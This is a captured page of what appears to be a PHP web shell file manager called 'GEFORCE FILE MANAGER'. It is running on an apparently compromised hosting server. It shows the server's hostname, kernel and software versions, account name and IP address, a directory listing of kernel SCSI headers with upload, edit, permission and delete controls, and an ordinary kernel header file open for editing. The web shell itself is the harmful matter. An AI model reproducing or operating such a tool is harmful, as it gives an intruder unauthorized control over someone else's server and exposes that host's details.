[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
scsi
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 fc
SET
[ DEL ]
📄 fc_frame.h
7,819 B
SET
[ EDIT ]
|
[ DEL ]
📄 fcoe_sysfs.h
3,843 B
SET
[ EDIT ]
|
[ DEL ]
📄 iscsi_if.h
26,213 B
SET
[ EDIT ]
|
[ DEL ]
📄 iscsi_proto.h
15,907 B
SET
[ EDIT ]
|
[ DEL ]
📄 iser.h
2,397 B
SET
[ EDIT ]
|
[ DEL ]
📄 libfc.h
31,676 B
SET
[ EDIT ]
|
[ DEL ]
📄 libfcoe.h
13,693 B
SET
[ EDIT ]
|
[ DEL ]
📄 libiscsi.h
14,612 B
SET
[ EDIT ]
|
[ DEL ]
📄 libiscsi_tcp.h
3,886 B
SET
[ EDIT ]
|
[ DEL ]
📄 libsas.h
19,047 B
SET
[ EDIT ]
|
[ DEL ]
📄 osd_attributes.h
15,411 B
SET
[ EDIT ]
|
[ DEL ]
📄 osd_protocol.h
17,989 B
SET
[ EDIT ]
|
[ DEL ]
📄 osd_sec.h
1,520 B
SET
[ EDIT ]
|
[ DEL ]
📄 osd_sense.h
10,126 B
SET
[ EDIT ]
|
[ DEL ]
📄 osd_types.h
1,020 B
SET
[ EDIT ]
|
[ DEL ]
📄 sas.h
13,533 B
SET
[ EDIT ]
|
[ DEL ]
📄 sas_ata.h
2,800 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi.h
9,137 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_bsg_iscsi.h
2,204 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_cmnd.h
11,557 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_common.h
2,160 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_dbg.h
2,132 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_device.h
22,778 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_devinfo.h
3,869 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_dh.h
3,242 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_driver.h
897 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_eh.h
1,702 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_host.h
29,012 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_ioctl.h
1,285 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_proto.h
11,559 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_request.h
667 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_tcq.h
993 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_transport.h
2,610 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_transport_fc.h
28,769 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_transport_iscsi.h
17,659 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_transport_sas.h
7,035 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_transport_spi.h
6,682 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsi_transport_srp.h
4,883 B
SET
[ EDIT ]
|
[ DEL ]
📄 scsicam.h
636 B
SET
[ EDIT ]
|
[ DEL ]
📄 sg.h
12,421 B
SET
[ EDIT ]
|
[ DEL ]
📄 srp.h
7,226 B
SET
[ EDIT ]
|
[ DEL ]
📄 viosrp.h
6,212 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: scsi_dbg.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _SCSI_SCSI_DBG_H #define _SCSI_SCSI_DBG_H struct scsi_cmnd; struct scsi_device; struct scsi_sense_hdr; extern void scsi_print_command(struct scsi_cmnd *); extern size_t __scsi_format_command(char *, size_t, const unsigned char *, size_t); extern void scsi_print_sense_hdr(const struct scsi_device *, const char *, const struct scsi_sense_hdr *); extern void scsi_print_sense(const struct scsi_cmnd *); extern void __scsi_print_sense(const struct scsi_device *, const char *name, const unsigned char *sense_buffer, int sense_len); extern void scsi_print_result(const struct scsi_cmnd *, const char *, int); #ifdef CONFIG_SCSI_CONSTANTS extern bool scsi_opcode_sa_name(int, int, const char **, const char **); extern const char *scsi_sense_key_string(unsigned char); extern const char *scsi_extd_sense_format(unsigned char, unsigned char, const char **); extern const char *scsi_mlreturn_string(int); extern const char *scsi_hostbyte_string(int); extern const char *scsi_driverbyte_string(int); #else static inline bool scsi_opcode_sa_name(int cmd, int sa, const char **cdb_name, const char **sa_name) { *cdb_name = NULL; switch (cmd) { case VARIABLE_LENGTH_CMD: case MAINTENANCE_IN: case MAINTENANCE_OUT: case PERSISTENT_RESERVE_IN: case PERSISTENT_RESERVE_OUT: case SERVICE_ACTION_IN_12: case SERVICE_ACTION_OUT_12: case SERVICE_ACTION_BIDIRECTIONAL: case SERVICE_ACTION_IN_16: case SERVICE_ACTION_OUT_16: case EXTENDED_COPY: case RECEIVE_COPY_RESULTS: *sa_name = NULL; return true; default: return false; } } static inline const char * scsi_sense_key_string(unsigned char key) { return NULL; } static inline const char * scsi_extd_sense_format(unsigned char asc, unsigned char ascq, const char **fmt) { *fmt = NULL; return NULL; } static inline const char * scsi_mlreturn_string(int result) { return NULL; } static inline const char * scsi_hostbyte_string(int result) { return NULL; } static inline const char * scsi_driverbyte_string(int result) { return NULL; } #endif #endif /* _SCSI_SCSI_DBG_H */